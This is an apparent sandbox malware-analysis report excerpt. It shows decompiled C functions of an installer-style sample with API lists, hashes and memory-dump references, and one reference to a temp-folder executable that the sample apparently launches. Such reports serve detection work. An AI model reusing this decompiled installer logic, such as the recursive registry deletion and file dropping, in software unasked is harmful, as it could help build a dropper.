                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                  • String ID: ... %d%%
                                                  • API String ID: 722711167-2449383134
                                                  • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                  • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                  • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                  • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                  0x00404f8d
                                                  0x00404f9a
                                                  0x00404fa0
                                                  0x00404fde
                                                  0x00404fde
                                                  0x00404fed
                                                  0x00404ff4
                                                  0x00000000
                                                  0x00404ff6
                                                  0x00404fa2
                                                  0x00404fb1
                                                  0x00404fb9
                                                  0x00404fbc
                                                  0x00404fce
                                                  0x00404fd4
                                                  0x00404fdb
                                                  0x00000000
                                                  0x00404fdb
                                                  0x00000000

                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                  • GetMessagePos.USER32 ref: 00404FA2
                                                  • ScreenToClient.USER32 ref: 00404FBC
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                  0x00402fa3
                                                  0x00402fb1
                                                  0x00402fb7
                                                  0x00402fb7
                                                  0x00402fc5
                                                  0x00402fc7
                                                  0x00402fd3
                                                  0x00402fd8
                                                  0x00402fda
                                                  0x00402fda
                                                  0x00402fe5
                                                  0x00402ff5
                                                  0x00403007
                                                  0x00403007
                                                  0x0040300f

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                  • API String ID: 1451636040-1158693248
                                                  • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                  • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                  • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                  • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                  0x00402950
                                                  0x00402952
                                                  0x00402957
                                                  0x0040295c
                                                  0x0040295f
                                                  0x00402969
                                                  0x0040296d
                                                  0x0040296d
                                                  0x00402973
                                                  0x00402980
                                                  0x00402988
                                                  0x0040298b
                                                  0x00402997
                                                  0x0040299a
                                                  0x004029a0
                                                  0x004029ae
                                                  0x004029b3
                                                  0x004029b7
                                                  0x004029ba
                                                  0x004029c3
                                                  0x004029cf
                                                  0x004029d3
                                                  0x004029d6
                                                  0x004029e0
                                                  0x004029ff
                                                  0x004029e7
                                                  0x004029ec
                                                  0x004029f4
                                                  0x004029f7
                                                  0x004029fc
                                                  0x004029fc
                                                  0x00402a06
                                                  0x00402a06
                                                  0x00402a13
                                                  0x00402a19
                                                  0x00402a1f
                                                  0x00402a1f
                                                  0x004029b7
                                                  0x00402a33
                                                  0x00402a35
                                                  0x00402a35
                                                  0x00402a3f
                                                  0x00402a40
                                                  0x00402a44
                                                  0x00402a48
                                                  0x00402a4e
                                                  0x00402a4e
                                                  0x00402a55
                                                  0x004022f1
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                  • GlobalFree.KERNEL32 ref: 00402A06
                                                  • GlobalFree.KERNEL32 ref: 00402A19
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                  • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                  • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                  • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                  0x00404e7a
                                                  0x00404e7f
                                                  0x00404e87
                                                  0x00404e88
                                                  0x00404e95
                                                  0x00404e9d
                                                  0x00404e9e
                                                  0x00404ea0
                                                  0x00404ea2
                                                  0x00404ea4
                                                  0x00404ea7
                                                  0x00404ea7
                                                  0x00404eae
                                                  0x00404eb4
                                                  0x00404eb4
                                                  0x00404ebb
                                                  0x00404ec2
                                                  0x00404ec5
                                                  0x00404ec8
                                                  0x00404ec8
                                                  0x00404ecc
                                                  0x00404edc
                                                  0x00404ede
                                                  0x00404ee1
                                                  0x00404e8a
                                                  0x00404e8a
                                                  0x00404e91
                                                  0x00404e91
                                                  0x00404ee9
                                                  0x00404ef4
                                                  0x00404f0a
                                                  0x00404f1b
                                                  0x00404f37

                                                  APIs
                                                  • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                  • wsprintfW.USER32 ref: 00404F1B
                                                  • SetDlgItemTextW.USER32 ref: 00404F2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$H7B
                                                  • API String ID: 3540041739-107966168
                                                  • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                  • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                  • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                  • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 48%
                                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                  0x00402eb4
                                                  0x00402ebd
                                                  0x00402ec6
                                                  0x00402ed2
                                                  0x00402edb
                                                  0x00402ee5
                                                  0x00402f0a
                                                  0x00402f10
                                                  0x00402f15
                                                  0x00402f16
                                                  0x00402f46
                                                  0x00402f1f
                                                  0x00402f21
                                                  0x00402f71
                                                  0x00402f74
                                                  0x00000000
                                                  0x00402f7a
                                                  0x00402f30
                                                  0x00402f35
                                                  0x00402f37
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f3f
                                                  0x00402f44
                                                  0x00402f45
                                                  0x00402f45
                                                  0x00402f52
                                                  0x00402f5a
                                                  0x00402f61
                                                  0x00000000
                                                  0x00402f8a
                                                  0x00000000
                                                  0x00402f69
                                                  0x00402ef5
                                                  0x00402f08
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f08
                                                  0x00402f90

                                                  APIs
                                                  • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseEnum$DeleteValue
                                                  • String ID:
                                                  • API String ID: 1354259210-0
                                                  • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                  • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                  • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                  • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                  0x00401d81
                                                  0x00401d85
                                                  0x00401d9a
                                                  0x00401d87
                                                  0x00401d89
                                                  0x00401d8f
                                                  0x00401d8f
                                                  0x00401da0
                                                  0x00401da3
                                                  0x00401dad
                                                  0x00401db0
                                                  0x00401db8
                                                  0x00401dc9
                                                  0x00401dcc
                                                  0x00401dd7
                                                  0x00401dce
                                                  0x00401dd0
                                                  0x00401dd0
                                                  0x00401ddb
                                                  0x00401de5
                                                  0x00401e0c
                                                  0x00401e1b
                                                  0x00401e29
                                                  0x00401e31
                                                  0x00401e39
                                                  0x00401e39
                                                  0x00401e42
                                                  0x00401e48
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                  • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                  • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                  • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                  0x00401e4e
                                                  0x00401e59
                                                  0x00401e5b
                                                  0x00401e68
                                                  0x00401e7f
                                                  0x00401e84
                                                  0x00401e91
                                                  0x00401e96
                                                  0x00401e9a
                                                  0x00401ea5
                                                  0x00401eac
                                                  0x00401ebe
                                                  0x00401ec4
                                                  0x00401ec9
                                                  0x00401ed3
                                                  0x00402638
                                                  0x0040156d
                                                  0x00402ba4
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E51
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                  • ReleaseDC.USER32 ref: 00401E84
                                                    • Part of subcall function 004066A5: lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
